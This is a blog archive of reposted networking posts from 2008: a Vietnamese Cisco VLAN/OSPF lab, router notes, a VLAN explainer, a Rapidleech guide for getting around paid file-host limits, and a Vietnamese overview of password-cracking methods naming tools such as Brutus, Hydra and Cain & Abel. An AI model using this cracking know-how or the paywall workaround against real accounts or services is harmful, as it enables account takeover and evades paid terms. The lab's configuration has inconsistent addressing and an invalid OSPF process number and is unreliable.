Chỉ cần cấu hình Trunking, sau đó đưa ALSwitch vào cùng VTP domain Vnpro ở mode client, ALSwitch sẽ tự động học thông tin Vlan từ VTP server (DLSwitch).
ALSwitch#vlan database
ALSwitch(vlan)#vtp domain Vnpro
Changing VTP domain name from NULL to Vnpro
ALSwitch(vlan)#vtp client
Setting device to VTP CLIENT mode.
ALSwitch(vlan)#exit
In CLIENT state, no apply attempted.
Exiting....
ALSwitch#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
ALSwitch(config)#interface FastEthernet 0/1
ALSwitch(config-if)#switchport trunk encapsulation dot1q
ALSwitch(config-if)#switchport mode trunk
ALSwitch(config-if)#exit
ALSwitch(config)#interface range FastEthernet0/4 - 8
ALSwitch(config-if)#switchport access vlan 10
ALSwitch(config-if)#exit
ALSwitch(config)#interface FastEthernet0/9 - 12
ALSwitch(config-if)#switchport access vlan 20
ALSwitch(config-if)#exit
ALSwitch(config)#^Z
ALSwitch#
00:13:00: %SYS-5-CONFIG_I: Configured from console by console
Kiểm tra thông tin Vlan trên ALSwitch:
ALSwitch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/2, Fa0/3
10 Admin active Fa0/4, Fa0/5, Fa0/6, Fa0/7,
Fa0/8
20 User active Fa0/9, Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 0 0
10 enet 100010 1500 - - - - - 0 0
20 enet 100020 1500 - - - - - 0 0
1002 fddi 101002 1500 - 0 - - - 0 0
1003 tr 101003 1500 - 0 - - srb 0 0
1004 fdnet 101004 1500 - - - ieee - 0 0
1005 trnet 101005 1500 - - - ibm - 0 0
ALSwitch#
Tiến hành giai đoạn 2:
DLSwitch(config)#interface FastEthernet 0/2
DLSwitch(config-if)#no switchport
DLSwitch(config-if)#ip address 10.200.1.1 255.255.255.0
DLSwitch(config-if)#no shutdown
00:14:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/2, changed state to downxit
Lệnh “no switchport” kích hoạt tính năng hoạt động ở lớp 3 cho Catalyst 3550. Lúc này port FastEthernet 0/2 có khả năng hoạt động như một cổng trên Router. Tuy nhiên kết nối giữa DLSwitch và Remote Router qua port này vẫn sử dụng Straight Cable, kết nối giữa DLSwitch và ALSwitch qua port FastEthernet 0/1 dùng Cross Cable. Cấu hình định tuyến:
DLSwitch(config)#ip routing
DLSwitch(config-router)#router ospf 0
DLSwitch(config-router)#network 10.200.0.0 0.0.0.255 area 0
DLSwitch(config-router)#network 192.168.1.0 0.0.0.255 area 0
DLSwitch(config-router)#network 192.168.10.0 0.0.0.255 area 0
DLSwitch(config-router)#network 192.168.20.0 0.0.0.255 area 0
DLSwitch(config-router)#^z
Cấu hình trên Remote Router
Cấu hình các thông số cơ bản:
Router>enable
Router#config terminal
Router(config)#hostname Remote
Remote(config)#enable password cisco
Remote(config)#enable secret vnpro
Remote(config)#line vty 0 4
Remote(config-line)#password cisco
Remote(config-line)#login
Remote(config-line)#exit
Remote(config)#interface interface ethernet0/0
Remote(config-if)#ip address 10.200.1.2 255.255.255.0
Remote(config-if)#no shut
Remote(config-if)#
*Mar 1 00:10:39.175: %LINK-3-UPDOWN: Interface Ethernet0/0, changed state to up
Remote(config-if)#exit
Remote(config)#interface loopback 0
Remote(config-if)#ip address 172.168.0.1 255.255.255.0
Remote(config-if)#no shutdown
Remote(config-if)#exit
*Mar 1 00:11:26.749: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback0, changed state to up
Remote(config)#router ospf 1
Remote(config-router)#network 172.168.0.0 0.0.0.255 area 0
Remote(config-router)#network 10.200.1.0 0.0.0.255 area 0
Remote(config-router)#^Z
Mar 1 00:13:35.347: %SYS-5-CONFIG_I: Configured from console by console
Cấu hình các interface và cấu hình định tuyến
Xem thông tin định tuyến trên DLSwitch
DLSwitch>enable
DLSwitch#show ip route
Gateway of last resort is not set
C 192.168.10.0/24 is directly connected, Vlan10
172.168.0.0/32 is subnetted, 1 subnets
O 172.168.0.1 [110/11] via 10.200.0.2, 00:22:50, FastEthernet0/2
C 192.168.20.0/24 is directly connected, Vlan20
10.0.0.0/24 is subnetted, 1 subnets
C 10.200.0.0 is directly connected, FastEthernet0/2
C 192.168.1.0/24 is directly connected, Vlan1
Xem thông tin bản định tuyến trên Remote router:
DLSwitch#telnet 10.200.0.2
Trying 10.200.0.2 ... Open
User Access Verification
Password: cisco
Remote>enable
Password: vnpro
Remote#show ip route
Gateway of last resort is not set
O 192.168.10.0/24 [110/11] via 10.200.0.1, 00:23:53, Ethernet0/0
172.168.0.0/24 is subnetted, 1 subnets
C 172.168.0.0 is directly connected, Loopback0
O 192.168.20.0/24 [110/11] via 10.200.0.1, 00:23:53, Ethernet0/0
10.0.0.0/24 is subnetted, 1 subnets
C 10.200.0.0 is directly connected, Ethernet0/0
O 192.168.1.0/24 [110/11] via 10.200.0.1, 00:23:53, Ethernet0/0
Kiểm tra tính kết nối bằng cách dùng một máy trạm nối vào một Vlan bất kỳ. Ping thấy

http://vnpro.org/forum/files/labswitching/lab61/lab61-2.JPG

interface Looback 0 trên Remote Router. Work Station có địa chỉ truộc về Vlan 10. Với Default Gateway là Mangement IP của Vlan 10. Dùng WorkStation trên Vlan 10 có địa chỉ như trên ping đến Looback 0 trên Remote Router và ghi nhậm kết quả. Kiểm tra khả năng InterVlan Routing bằng cách dùng một Work Station trên Vlan 20 ping dến Work Station trên Vlan 10 và ghi nhận kết quả

http://vnpro.org/forum/files/labswitching/lab61/lab61-3.JPG

http://vnpro.org/forum/files/labswitching/lab61/lab61-4.JPG

url:http://vnpro.org/forum/archive/index.php?t-5642.html

Cisco Routers - Basic notes

2008-10-01T03:20:00.000-07:00

Cisco Routers - Basic notes
I am playing with Cisco routers now, this are be my notes:

Internal Components:

* RAM. Random access memory. This is the working buffer memory.
* ROM. Read only memory. contains bootstrap process and basic (most of times) IOS for basic functionality (as recover password)
* FLASH MEMORY. Stores full image of IOS.--
* NVRAN. non valitle RAM. Does not loose power when turn off.
* - start up configuration file

Boot process:

* a. Power on
* b. Power on Self Test (POST) (check memory, and cards).
* c. bootstrap from ROM
* d. looks in FLASH for IOS
* e. loads the IOS into RAM from FLASH
* f. IOS looks for configuration in NVRAM
* f.1 If found it load the IOS into FLASH Memory
* f.2 If not found executes teh auto setup mode (menu driven system).

Contexts:
router> ----> user mode (show config, telnet, basic)
router# ----> priviliged mode (show commands, pings, save config, backup)
router(config)# ----> global configuraiton mode (configuration interfaces, security, hostname)
Control - Z is to move from global configuration mode to priviliged mode.

Conectivity:
console port password -----> line con 0
auxiliary port password ---> line aux 0
telnet password -----------> line vty 0 4

Set up a passwords:
On the glboal configuration mode run the following commands to set up a password for the enable command:

router(config)# enable password xxxxxxxxxxx (sets the password but it is shown on screen)
router(config)# enable secret xxxxxxxxxxxxx (sets an encrypted enable password, once secret is enabled password by itself don't work anymore)

To set up password for different access:

router#
router(config)#line console 0 | line auxiliary 0 | line vty 0 4
router(config-line)# login (to ask for prompt)
router(config-line)# password xxxxxxxxxxxxx (to set up the passwod)
control-Z

To encrypt all passwords runt the following command:
router(config)service password-encryption

To set up a banner:
router(config)#banner motd $ message message message $
(Note $ is the delimeter and can be anything, just check to have spaces at the end and beginning)

Setting up an IP on an ehternet port:
A show running-config shows that I have one fastethernet port not configured, set as:
interface FastEthernet0
no ip address
shutdown
speed auto

To do this run:

1721-router#config t ---------> to enter global configuraiton mode
Enter configuration commands, one per line. End with CNTL/Z.
1721-router(config)#interface f0 ----> to enter configuration of fastethernet 0
1721-router(config-if)#ip address 192.168.1.3 255.255.255.0
1721-router(config-if)#no shutdown ----> to activate
1721-router(config-if)#
*Mar 1 07:56:30.838: %LINK-3-UPDOWN: Interface FastEthernet0, changed state top ----> that means I have physical connectivity
*Mar 1 07:56:31.838: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEther,change to up ------> shows I have encapsulation. Connections to another host.
1721-router#ping 192.168.1.1 ----> to test that is working I ping a pc on the network
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.1, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms
1721-router#

To save the configuration:
router#copy running-config start-config ----> for IOS version 12 and above
router#write memmory ---------> before IOS version 12

Example:
1721-router#copy run star
Destination filename [startup-config]?
Building configuration...
[OK]
1721-router#

To backup config:
router#copy run tftp --> this copy the running configuration TO the tftp server (will ask for details)
router#copy tftp run/start --> this copy the running configuration FROM the tftp server (will ask for details)
(NOT TESTED YET)

my passwords:
enable password/secret
console console
aux aux
telnet1-4 telnet
telnet0 telnet0

Hướng dẫn download Rapidshare bằng Rapidleech

2008-10-01T02:15:00.001-07:00

Hướng dẫn download Rapidshare bằng Rapidleech

Rapidleech là gì?

Rapidleech là 1 công cụ (phần mềm web) cho phép bạn download miễn phí các file từ các website chia sẻ nổi tiếng thế giới như Rapidshare.com, Megaupload.com, FileFactory.com...

"leech" dịch qua tiếng Việt nghĩa là "con đỉa", "đeo bám". Mà con đỉa thì hút máu từ chủ thể sang cơ thể nó. Rapidleech cũng tương tự thế, nó hút/download file trên các website chia sẻ về nơi đang lưu trữ công cụ Rapidleech. Từ đó ta có thể dùng các phần mềm download như Flashget, Internet Download Manager download về mà không cần dùng đến tài khoản Premium (trả tiền). Giải thích nôm na như thế, hi vọng các bạn sẽ cảm thấy dễ hiểu.

Làm sao để có công cụ Rapidleech?

Có 2 cách:

1. Cách 1: bạn chọn 1 trong các địa chỉ ở cuối trang này (download rất nhanh)
2. Cách 2: bạn cài đặt Rapidleech lên localhost (download sẽ rất chậm), cài đặt thế nào thì Admin sẽ có bài viết hướng dẫn khác.

Hướng dẫn download

1. Khi truy cập vào website Rapidleech (1 trong các địa chỉ ở cuối trang), bạn sẽ thấy màn hình sau:

2. Bạn dán link của Rapidshare vào ô Link to download, rồi nhấn Download File

3. Sau đó, bạn đợi 1 khoảng thời gian ngắn để đồng hồ đếm ngược về 0 (chừng 1 phút đổ lại)

4. Khách vãng lai sẽ thấy xuất hiện 4 ký tự, hãy nhập 4 ký tự này vào ô bên dưới nó (chữ thường chữ hoa đều được, số 0 hay chữ O cũng như nhau)

5. Đợi 1 khoảng thời gian ngắn, bạn sẽ nhận được link để download trực tiếp bằng Flashget, IDM...

Lỗi thường gặp

Dòng thông báo "Download limit exceeded. You have to wait 12 minute(s) until the next download" xuất hiện vì có người nào đó đã dùng trang này để download trước bạn. Bạn phải chờ sau 12 phút mới có thể download.

Sau khi hết 12 phút, bạn phải thử download lại ngay, nếu không, có ai "nhanh tay" hơn, họ sẽ "giành" quyền download, nghĩa là bạn lại phải đợi tiếp.

Mẹo: Thay vì ngồi đợi thời gian dài thế này, bạn có thể chọn 1 trang Rapidleech khác (1 trong các link bên dưới) để download.

Nói chung, nếu vào thấy lỗi, thì chọn 1 link khác

Xem: Hướng dẫn download Rapidshare bằng tay không (không dùng Rapidleech, không có tài khoản Premium)
Download bằng Premium Generator: http://www.rapid4free.com

Danh sách các địa chỉ có Rapidleech do chính Diễn đàn Tin học Việt Nam sưu tầm:

1. http://rapidleech.1kho.com (Dùng tài khoản Premium, download nhanh, giới hạn 25GB/5 ngày)
2. http://rapidshare.downloader.googlepages.com
3. http://www.hosthot.info/leech/index.php
4. http://208.78.173.8/~vndownlo/
5. http://www1.rapidleech.vn
6. http://www2.rapidleech.vn
7. http://www3.rapidleech.vn
8. http://www.123bongda.net
9. http://rapid.aloxovn.com
10. http://rapid0.aloxovn.com
11. http://free4all.aloxovn.com
12. http://rapid1.aloxovn.com
13. http://rapid2.aloxovn.com
14. http://rapid3.aloxovn.com
15. http://www.tgshare.com/index.php
16. http://van.hostagig.com/Bimat
17. http://load-nhacvn.co.uk/rapids/index.php
18. http://www.4musicfree.com/Leech/index.php
19. http://dropszonepanel.com/rapidleech
20. http://alolove.4vn.in
21. http://gamesrodd.com/gaming
22. http://hendy.li/index.php
23. http://dentistho.com/rapidleech/index.php
24. http://info-tinhyeuhoctro.com/kill/dl/hnam.php
25. http://chanquadimat.com/rpleech/index.php
26. http://grovesexuality.info/rapi/
27. http://freakystreaks.net/backup/
28. http://ala.love.free.fr/rapid/
29. http://www.evilartix.com/leech2/
30. http://haghighatpour.com/
31. http://newjeuxweb.net/rapide/index.php
32. http://haddok.co.uk/rapid/
33. http://www.gamesrodd.com/gaming/
34. http://thanlong.com/quanglh/rapidleech
35. http://filmloaderone.com/a/index.php
36. http://www.jackiechun.yurx.com/
37. http://www.4musicfree.com/Leech/
38. http://arch18.freewebhosting360.com/
39. http://vieclam.org/rapid/
40. http://www.rand0m-stuff.com/rl/index1.php
41. http://info-tinhyeuhoctro.com/kill/dl/hnam.php
42. http://chanquadimat.com/rpleech/index.php
43. http://grovesexuality.info/rapi/
44. http://gamesrodd.com/gaming/index.php
45. http://nhactxq.com/fetch/
46. http://filmloaderone.com/a/index.php
47. http://dropszonepanel.com/rapidleech/index.php
48. http://www.kruubon.com/rapidleech/
49. http://freakystreaks.net/backup/
50. http://biggunseafood.com/leechlinkneo/
51. http://thanlong.com/quanglh/rapidleech/index.php
52. http://scorat.com/up/index.php
53. http://www.rapidhelp.us/RL/

__________________
www.DIENDANTINHOC.vn

What is a VLAN? How to Setup a VLAN on a Cisco Switch

2008-09-30T02:29:00.000-07:00

url:http://www.petri.co.il/csc_setup_a_vlan_on_a_cisco_switch.htm

What is a VLAN? How to Setup a VLAN on a Cisco Switch

Have you ever wondered what a Virtual LAN (or VLAN) is or been unclear as to why you would want one? If so, I have been in your place at one time too. Since then, I have learned a lot about what a VLAN is and how it can help me. In this article, I will share that knowledge with you.

Preparing for Cisco CCNP Exams? These are the videos you need to get certified...

Whether you are studying for the BCSI, BCMSN, ONT, ISCW or all four, Train Signal's Cisco CCNP Training Series is the best out there. The instructor uses a "hands-on" method for teaching complex technologies. Each video covers all the bases and gives you more than enough test prep to pass any of your CCNP exams!

Daniel Petri

Click Here to Watch the Cisco CCNP Training Videos!
What is a LAN?

Okay, most of you already know what a LAN is but let’s give it a definition to make sure. We have to do this because, if you don’t know what a LAN is, you can’t understand what a VLAN is.

A LAN is a local area network and is defined as all devices in the same broadcast domain. If you remember, routers stop broadcasts, switches just forward them.
What is a VLAN?

As I said, a VLAN is a virtual LAN. In technical terms, a VLAN is a broadcast domain created by switches. Normally, it is a router creating that broadcast domain. With VLAN’s, a switch can create the broadcast domain.

This works by, you, the administrator, putting some switch ports in a VLAN other than 1, the default VLAN. All ports in a single VLAN are in a single broadcast domain.

Because switches can talk to each other, some ports on switch A can be in VLAN 10 and other ports on switch B can be in VLAN 10. Broadcasts between these devices will not be seen on any other port in any other VLAN, other than 10. However, these devices can all communicate because they are on the same VLAN. Without additional configuration, they would not be able to communicate with any other devices, not in their VLAN.
Are VLANs required?

It is important to point out that you don’t have to configure a VLAN until your network gets so large and has so much traffic that you need one. Many times, people are simply using VLAN’s because the network they are working on was already using them.

Another important fact is that, on a Cisco switch, VLAN’s are enabled by default and ALL devices are already in a VLAN. The VLAN that all devices are already in is VLAN 1. So, by default, you can just use all the ports on a switch and all devices will be able to talk to one another.
When do I need a VLAN?

You need to consider using VLAN’s in any of the following situations:

*

You have more than 200 devices on your LAN
*

You have a lot of broadcast traffic on your LAN
*

Groups of users need more security or are being slowed down by too many broadcasts?
*

Groups of users need to be on the same broadcast domain because they are running the same applications. An example would be a company that has VoIP phones. The users using the phone could be on a different VLAN, not with the regular users.
*

Or, just to make a single switch into multiple virtual switches.

Why not just subnet my network?

A common question is why not just subnet the network instead of using VLAN’s? Each VLAN should be in its own subnet. The benefit that a VLAN provides over a subnetted network is that devices in different physical locations, not going back to the same router, can be on the same network. The limitation of subnetting a network with a router is that all devices on that subnet must be connected to the same switch and that switch must be connected to a port on the router.

With a VLAN, one device can be connected to one switch, another device can be connected to another switch, and those devices can still be on the same VLAN (broadcast domain).
How can devices on different VLAN’s communicate?

Devices on different VLAN’s can communicate with a router or a Layer 3 switch. As each VLAN is its own subnet, a router or Layer 3 switch must be used to route between the subnets.
What is a trunk port?

When there is a link between two switches or a router and a switch that carries the traffic of more than one VLAN, that port is a trunk port.

A trunk port must run a special trunking protocol. The protocol used would be Cisco’s proprietary Inter-switch link (ISL) or the IEEE standard 802.1q.
How do I create a VLAN?

Configuring VLAN’s can vary even between different models of Cisco switches. Your goals, no matter what the commands are, is to:

*

Create the new VLAN’s
*

Put each port in the proper VLAN

Let’s say we wanted to create VLAN’s 5 and 10. We want to put ports 2 & 3 in VLAN 5 (Marketing) and ports 4 and 5 in VLAN 10 (Human Resources). On a Cisco 2950 switch, here is how you would do it:

At this point, only ports 2 and 3 should be able to communicate with each other and ports 4 & 5 should be able to communicate. That is because each of these is in its own VLAN. For the device on port 2 to communicate with the device on port 4, you would have to configure a trunk port to a router so that it can strip off the VLAN information, route the packet, and add back the VLAN information.
What do VLAN’s offer?

VLAN’s offer higher performance for medium and large LAN’s because they limit broadcasts. As the amount of traffic and the number of devices grow, so does the number of broadcast packets. By using VLAN’s you are containing broadcasts.

VLAN’s also provide security because you are essentially putting one group of devices, in one VLAN, on their own network.
Article Summary

Here is what we have learned:

*

A VLAN is a broadcast domain formed by switches
*

Administrators must create the VLAN’s then assign what port goes in what VLAN, manually.
*

VLAN’s provide better performance for medium and large LAN’s.
*

All devices, by default, are in VLAN 1.
*

A trunk port is a special port that runs ISL or 802.1q so that it can carry traffic from more than one VLAN.
*

For devices in different VLAN’s to communicate, you must use a router of Layer 3 switch.

Giới thiệu các phương thức Cr@ck Passwords - Cách đề phòng

2008-09-26T11:24:00.000-07:00

Giới thiệu các phương thức Cr@ck Passwords - Cách đề phòng
Giới thiệu các phương thức Cr@ck Passwords - Cách đề phòng
Username Password là hai vấn đề nhạy cảm nhất trong một máy tính, một mạng nhỏ cho tới mạng Internet. Trong bài viết này tôi trình bày với các bạn tổng quát về các phương thức xác thực, các cách phá mật khẩu và các Tools sử dụng để phá mật khẩu. Từ đó các bạn sẽ biết cách tự bảo vệ mình trước các cuộc tấn công.
Trong bài viết này tôi sẽ trình bày chi tiết với các bạn những phần sau:
- Authentication – xác thực
- Authentication Mechanisms – Các phương thức xác thực
- Phá Password
- Những tấn công dựa vào phá Password
- Thực hiện một quá trình phá Password
- Phân chia các loại tấn công
- Các công cụ sử dụng để phá Password.
- Các phương thức cụ thể.
Các bước tiến hành trong quá trình tấn công phá mật khẩu
1. Xác thực – Authentication
- Xác thực là một quá trình nhận dạng người dùng
- Trong hệ thống mạng máy tính, xác thực chủ yếu sử dụng LoginID (Username) và Password.
- Biết mật khẩu của một tài khoản là điều cần thiết để xác thực
- Nhưng Password có thể bị mất, bị đánh cắp, bị thay đổi và bị phá, điều này dẫn tới nguy cơ bảo mật cho hệ thống.
2. Các phương thức xác thực
Hầu hết các phương thức xác thực đều dựa trên:
+ Những gì bạn biết (Username Password)
+ Những gì bạn có (Smart Card, Certificate)
+ Những gì là bạn (Sinh trắc học)
- HTTP Authentication – Xác thực trên WEB.
+ Basic Authentication
+ Digest Authentication
- Kết hợp với phương thức xác thực NTLM của Windows
- Negotiate Authentication – Thỏa thuận xác thực
- Xác thực dựa vào Certificate.
- Xác thực dựa vào Forms
- Xác thực dựa vào RSA Secure Token
- Xác thực dựa vào Sinh trắc học (xác thực vân tay, mặt, mắt….)
2.1. HTTP Authentications
a. Basic Authentication
- Là một phương thức xác thực phổ thông có trên nền tảng ứng dụng Web.
- Nó sẽ xuất hiện ra khi Client yêu cầu những thông tin phải được xác thực.
- Giới hạn những giao thức, cho phép những kẻ tấn công khai thác.
- Sử dụng SSL để mã hóa dữ liệu Username Password để truyền giữa Client và Server.
b. Degest Authentication
- Được thiết kế để nâng cao bảo mật hơn phương thức Basic Authentication
- Được dựa trên nền tảng xác thực Challenge-Response
- Nâng cao bảo bảo mật hơn phương thức Basic Authentication, hệ thống sẽ mã hóa Usernaem Password trước khi truyền đi trên mạng.
2.2. Kết hợp với phương thức xác thực NTLM của Windows
- Sử dụng công nghệ xác thực NT LAN Manager (NTLM) cho HTTP
- Chỉ làm việc với IE và trên nền tảng Web server là IIS.
- Kết hợp với xác thực trên Windows sẽ thích hợp cho môi trường mạng cục bộ của doanh nghiệp
- Nó là một phương thức xác thực mà không phải truyền bất kỳ thông tin nào về Username password trên mạng.
2.3. Xác thực Negotiate.
- Đây là một phương thức xác thực mở rộng cho NTLM Authentication
- Cung cấp xác thực dựa trên nền tảng Kerberos
- Sử dụng quá trình thương lượng để quyết định mức độ bảo mật được sử dụng.
- Nó được cấu hình và sử dụng không chỉ cho mạng cục bộ.
2.4. Xác thực dựa vào Certificate.
- Sử dụng Public Key để mã hóa và chứng chỉ số (Digital Certificate) để xác thực người dùng.
- Nó được quan tâm và kết hợp với phương thức xác thực two-factor. Khi một người dùng biết được Username Password người đó còn phải cung cấp Certificate nữa thì mới được xác thực.
- Người dùng có thể bị đánh cắp Certtificate.
- Rất nhiều phần mềm hiện nay hỗ trợ xác thực qua chứng chỉ số.
2.5. Xác thực dựa vào Forms-Based.
- Nó không được hỗ trợ trên nền tảng HTTP và SSL
- Nó là một lựa chọn cao cấp cho phương thức xác thực sử dụng một Form, và thường tích hợp dạng HTML.
- Là một phương thức xác thực rất phổ biết trên Internet.
2.6. Phương thức xác thực RSA SecurID Token
- PHương thức xác thực SecureID sử dụng một "token – Vé, card). Có một thiết bị phần cứng sẽ sinh ra các mã xác thực sau mỗi 60 giây và sử dụng một tấm Card để giải mã key.
- Một người dùng thực hiện quá trình xác thực và tài nguyên mạng sẽ phải điền mã PIN và số hiển thị cho SecureID cho mỗi thời gian đó.
2.7. Biometrics Authentications
This image has been resized. Click this bar to view the full image. The original image is sized 597x303.
- Một hệ thống xác thực dựa vào Sinh trắc học sẽ phải có những thiết bị nhận diện được người dùng dựa vào các yếu tố sinh học như: Vân tay, mắt, mặt, bàn tay….
- Đây là một phương thức xác thực có tính bảo mật rất cao và thuận tiện cho người sử dụng không phải nhớ mật khẩu hay mang theo một tấm Card.
3. Làm thế nào để có một mật khẩu bảo mật.
- Áp đặt chính sách độ dài tối thiểu của mật khẩu là 8 và tốt nhất là 15
- Yêu cầu phải có những ký tự đặc biệt, số, chữ hoa, chữ thường trong một mật khẩu
- Không sử dụng bất kỳ từ khóa nào trong từ điển English hay những nước khác
- Không sử dụng Password giông tên Username, và phải thay đổi thường xuyên
- Chọn Password bạn dễ dàng sử dụng mà người khác khó đoán biết được.
4. Những khuyến cáo đặt password khác
- Đừng bao giờ chỉ đặt một ký tự đặc biệt sau một từ khóa ví dụ: Không đặt password là: vnexperts1
- Đừng bao giờ sử dụng ghép hai từ với nhau để được một Password ví như: vnevne
- Không đặt Password dễ đoán
- Không đặt password quá ngắn
- Không đặt Password mà từ thường xuyên gõ đúng như: asdf;lkj
- Hãy thay đổi mật khẩu thường xuyên ít nhất một tháng một lần – Hãy thay đổi ngay lập tức khi phát hiện ra mật khẩu của mình bị người khác sử dụng.
- Đừng bao giờ chứa Password trên máy tính của bạn – nhiều người có thói quen vào các trang web và lưu lại mật khẩu của mình điều này không bảo mật bởi mã hóa trong máy tính dễ dàng bị giải mã.
- Các mật khẩu trong Windows lưu vào các file .pwl không được bảo mật.
- Không nói cho người khác biết mật khẩu của mình.
- Không gửi mail và tránh đặt trùng Password trên nhiều ứng dụng
- Không ghi Password của mình ra cho dễ nhớ.
- Khi gõ Password hãy cẩn thận với các loại Keyloger và người xem chộm
5. Hacker lấy mật khẩu của bạn qua những phương pháp.
- Xem bạn gõ mật khẩu
- Tìm xem bạn có ghi mật khẩu của mình ra giấy hay không
- Đoán mật khẩu dựa vào các số quen thuộc như: 123456, 654321…
- Sử dụng phương thức tấn công Brute Force
+ Đây là phương thức tổng hợp các ký tự lần lượt để tấn tìm ra mật khẩu.
- Sử dụng phương thức tấn công Dictionary Attack
+ Phương thức tấn công này tìm mật khẩu trong một bộ từ điển được sinh ra trước đó.
- Cách tạo ra một mật khẩu khó:
+ Chẳng hạn mật khẩu của tôi ban đầu định đặt là: yeuemnhieu
+ Giờ tôi viết hoa chữ Y và chữ U thành: YeUemnhieU
+ Chữ E trong bảng chữ cái đứng vị chí 5 mật khẩu tôi thành: Y5U5mnhi5U
+ Chữ i tôi đổi thành ! mật khẩu thành Y5U5mnh!5U
+ Password của tôi đủ 10 ký tự có số, có hoa, có thường, có ký tự đặc biệt.
6. Xóa Password đã được lưu trong vWindows XP
- Vào run gõ: Rundll32.exe Keymgr.dll, KRShowKeyMgr
- Sẽ hiện ra bảng tương tự dưới đây và bạn hãy xóa hết những mật khẩu đã được lưu trong hệ thống.
7. Phá mật khẩu tổng quát
- Về định nghĩa một Password Cr@cker là chương trình có thể giải mã được mật khẩu hay có thể vô hiệu hóa được mật khẩu.
- Password Cr@cker có hai phương pháp chính đó là: Brute Force và Dictionary Attack, ngoài ra hiện nay mới có chương trình phá mật khẩu thông minh hơn hai kiểu cổ điển trên đó là phương thức tìm Password: Smart Table Recovery – đáp ứng tốc độ tìm mật khẩurất nhanh.
- Password Cr@cker cũng có thể là một chương trình dùng để giải mã những mật khẩu đã được mã hóa, ví như các mật khẩu được lưu trong IE, Firefox,…
8. Mục tiêu của các chương trình tìm mật khẩu.
- Trên hệ thống Windows và Linux có hai tài khoản toàn quyền trong hệ thống đó là: root và Administrator, và mục tiêu tấn công là tìm được password của hai tài khoản đó
- Khi tìm được Password của tài khoản có quyền quản trị kẻ tấn công sẽ toàn quyền với máy đích.
- Kẻ tấn công cũng có thể dùng các phần mềm Sniffer để tóm các gói tin Username Password được truyền đi trong hệ thống mạng.
- Và ảnh hưởng của việc bị chiếm mất quyền quản trị tùy thuộc hoàn toàn vào dữ liệu và các ứng dụng trong hệt hống.
9. Chương trình Password Cr@cker hoạt động như thế nào ?

- Để hiểu được một Password Cr@cker làm việc như thế nào chúng ta cần phải hiểu được các chương trình quản lý Password thực hiện ra sao. Hầu hết các chương trình quản lý Password đều mã hóa Password theo một phương thức nào đó.
- Mật khẩu sau khi được tạo ra và lưu vào trong hệ thống sẽ được mã hóa, hệ thống sẽ chứa Key để giải mã mật khẩu.
- Những phần mềm Password Cr@cker sẽ tìm cách lấy được các đoạn mật mã đó.
-Sau khi đã lấy được các đoạn mật mã trên máy của nạn nhân chúng sẽ tiến hành giải mã mật khẩu bằng những phương thức cụ thể cho từng tình huống.
10. Các dạng Password Cr@cker
- Dictionary Attack: Tìm mật khẩu trong một file từ điển tạo sẵn
- Brute Force Attack: Tìm mật khẩu bằng cách tổ hợp các ký tự
- Hybird Attack: Lai giữa hai phương thức trên
- Smart Table Recovery Attack: Phương thức tấn công tìm mật khẩu thông minh nhất dựa trên các bảng dữ liệu – Khoảng 700MB dữ liệu text.
11. Tìm Password bằng phương thức đơn giản
- Đoán mật khẩu
- Thay thế đoạn URL
12. Tìm Password bằng giải mã Cookies
- Với chương trình CT cookie Spy 2.0
- Cookies thương lưu lại rất nhiều thông tin quan trọng của người dùng khi truy cập vào Internet như Username và Password truy cập vào một Website.
- Với phần mềm này bạn có thể tìm kiếm các Cookies được lưu dữ trong hệ thống và giải mã chúng để tìm Username Password.
13. Tấn công Dictionary Attack.
- Tạo từ điển dùng phần mềm: Dictionary Maker
This image has been resized. Click this bar to view the full image. The original image is sized 595x352.
14. Danh sách các Tools Password Cr@ckers
-LophtCr@ck - WebCr@cker
- John The Ripper - Munga Bunga
- Brutus - ReadCookies
- Obiwan - SnadBoy
- Authforce - WinSSLMiM
- Hydra - RAR
- Cain & Abel Gammaprog
Hầu hết các tools này đều miễn phí và nếu có phí thì hoàn toàn Cr@ck được một cách dễ dàng
Hầu hết chúng đều có khả năng sử dụng tất cả các loại tấn công trên, đều có thể Export Username Password từ một hệ thống Local hay Remote.
- Theo kinh nghiệm của tôi hay dùng đó là: Cain & Abel tuy nhiên phần mềm này mạnh về giải mã và Sniffer hơn. LophCr@ck có lẽ Cr@ck khá nhanh bất kỳ password nào dài dưới 10 ký tự máy tính của tôi chỉ cần khoảng hơn 1 giờ là có thể giải mã được.
- John the Ripper đây là phần mềm chuyên phá mật khẩu trong môi trường Unix và sử dụng mã hóa DES, Extend DES, MD5 cũng tích hợp nhiều phương pháp giải mã.
- Brutus là một chương trình Online hay Remote Password Cr@cker. Tấn công tới một hệ thống như máy chủ IIS, Windows, Modem ADSL…. Chúng thử lần lượt Username và Password nhất định để tấn công vào máy chủ
- Obiwan khắc phục nhược điểm của Brutus là có độ trễ khi sử dụng Username Password sai.
- Authforce dựa vào HTTP Basic Authentication hỗ trợ việc thử Username Password tới một site nhất định
- MessenPass có thể giải nén được hầu hết các tài khoản chát như Yahoo, MSN…
Lưu ý từ phiên bản YM 7 password không bao giờ được lưu ở máy Local lên phần mềm này không Cr@ck được.
- Wireless WEP Key Password Spy đây là một tools hỗ trợ giải mã để truy cập vào một hệ thống mạng vWireless đặt mật khẩu.
(Theo Vnexperts Research Department)
__________________
This image has been resized. Click this bar to view the full image. The original image is sized 750x200.

Quy định chung của diễn đàn:

_http://forum.itlab.com.vn/forum/showthread.php?t=478

Pass mặc định của diễn đàn: www.itlab.com.vn

Phần mềm dùng để nối file: FFSJ

_http://www.jaist.ac.jp/~hoangle/filesj/index.html

url:http://forum.itlab.com.vn/forum/showthread.php?t=4299

How to configure RPC dynamic port allocation to work with firewalls

2008-09-25T21:28:00.000-07:00

url:http://support.microsoft.com/kb/154596

How to configure RPC dynamic port allocation to work with firewalls
View products that this article applies to.
Article ID : 154596
Last Review : October 26, 2007
